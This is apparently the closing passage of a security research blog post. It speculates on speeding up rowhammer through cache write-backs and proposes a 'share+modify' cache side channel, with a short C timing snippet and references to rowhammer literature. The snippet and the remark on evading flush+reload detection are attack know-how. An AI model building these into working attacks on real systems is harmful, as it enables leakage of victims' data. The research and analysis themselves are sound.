I don’t know if we can get this fast enough for actual row hammering. I don’t know how fast we can get two addresses into L2 and then cause them to be written back out again. And since I’m currently without accesses to a computer with ram susceptible to row hammer  I’ll leave it to other people to figure out if it works. Also I’m not really strong in Java script and thus have no clue if the threaded version would really be implementable in JS.  I cannot imagine a world where the non-threaded version isn’t implementable in JS.

Yet another cache side channel attack

Obviously we have another type of cache side channel here. Since it takes longer to write to shared memory, we know for sure that we can use the method for a side channel attack - that is, we can detect whether a victim uses a read/write address enough to place it in L1 or L2. For lack of a better name I call it share+modify. There can be many different actual implementations of this cache attack. The simplest might look like this:

    _mm_mfence();
    uint64_t start = __rdtsc();
    *(volatile char *)address_of_interest = 1;   // modify the shared read/write cache line
    _mm_mfence();
    uint64_t information = __rdtsc() - start;    // high latency => the victim had the line in L1/L2

However, it's an impractical side channel attack. The reason is that shared memory with read/write access is required, and while shared read-only memory is common through deduplication and shared libraries, shared read/write memory is quite scarce. The advantageous thing from an attacker's viewpoint is that it might trigger other performance counters than the classical flush+reload and thus evade the detections suggested for that attack. Might. Also, the chance of a victim actually loading stuff into L2 is much lower than into L3, so a lot less information is likely to be revealed by this attack.

Literature

[1] Mark Seaborn, Thomas Dullien (March 9, 2015): "Exploiting the DRAM rowhammer bug to gain kernel privileges". googleprojectzero.blogspot.com
[2] Daniel Gruss, Clémentine Maurice, Stefan Mangard (2015): "Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript". http://arxiv.org/abs/1507.06955
[3] David Levinthal (201x): "Performance Analysis Guide for Intel® Core™ i7 Processor and Intel® Xeon™ 5500 processors". https://software.intel.com/sites/products/collateral/hpc/vtune/performance_analysis_guide.pdf
[4] Intel (201x): "Avoiding and identifying false sharing among threads". https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads
[5] Seaborn (2015): "How physical addresses map to rows and banks in DRAM"